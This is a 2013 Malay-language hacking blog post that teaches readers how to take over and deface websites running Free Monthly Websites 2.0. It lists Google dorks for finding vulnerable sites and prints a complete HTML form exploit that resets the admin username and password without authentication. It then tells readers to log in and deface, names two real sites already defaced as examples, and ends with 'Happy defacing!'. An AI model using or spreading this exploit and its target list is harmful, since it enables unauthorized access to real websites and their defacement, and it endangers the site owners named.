Thursday, 25 April 2013

Free Monthly Websites 2.0 Administrator Remote Password Change

Deface website dengan remote password change

Assalamualaikum dan salam sejahtera.Hari ni aku nak ajar exploit baru iaitu remote administrator password change.Benda apa ni?
Exploit ni boleh tukar password dan username pada website yang terdedah secara remote.

Ok jom mula.

1. Mula-mula jadi laman sasaran dengan menggunakan salah satu google dork dibawah :


- inurl:/index_ebay.php

- "Powered by: Resell Rights Fortune"
- Powered By: Free Monthly Websites 2.0

2. Copy script dibawah :

Tukar http://www.target.com/ kepada link laman sasaran yang korang dapat tadi.


<html>

        <head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head>
    <body>
            <td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0">
            <form name="frm" action="http://www.target.com/admin/file_io.php" method="post" onSubmit="return chk()">
            <input type="hidden" name="do_type" value="admin_settings_write">
        <tr>
            <td height="100" colspan="2" align="center" valign="middle">
            <font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td>
        </tr>
        <tr>
            <td width="300" height="50" align="center" valign="middle">
            <font color="#808080">New Username:</font>
            </td>
            <td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
        </tr>
            </td>
        <tr>
            <td width="300" height="62" align="center" valign="middle">
            <font color="#808080">New Password: </font> </td>
            <td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" ><p>
            <input type="submit" name="Submit" value="Save" style="font-weight: 700"><br>
            </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b>
                <a href="http://www.y-aboukir.info/" style="text-decoration: none">
                <font color="#000000">Yassin ABOUKIR</font></a></p></td>
        </tr>
    </body>
<html>




Save sebagai exploit.html .

3. Selepas itu, buka script yang korang save tadi dalam browser korang. (right click > open with > browser)


Isikan kotak New Username dan New Password dengan apa2 yang korang suka.Username dan Password yang korang isi ni akan digunakan untuk login di website sasaran korang.

Selepas dah isi, click Save dan kalau berjaya korang akan di redirect ke login page website sasaran korang tadi :D




Apa yang korang perlu buat seterusnya ialah Login dengan username dan password yang korang buat tadi!

Kalau tak berjaya, akan keluar :
The file settings/admin_settings.txt is not writable

Lepas dah berjaya login, korang boleh la deface :D

Ni contoh website yang aku dapat :


http://www.jerry-lyons.com/page.php?id=Top_Reasons.html
http://zone-h.org/mirror/id/19689275

http://www.windowmagic.co/
http://zone-h.org/mirror/id/19689294

Korang boleh la mencuba dengan website2 ni.Happy defacing!
Item Reviewed: Free Monthly Websites 2.0 Administrator Remote Password Change Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com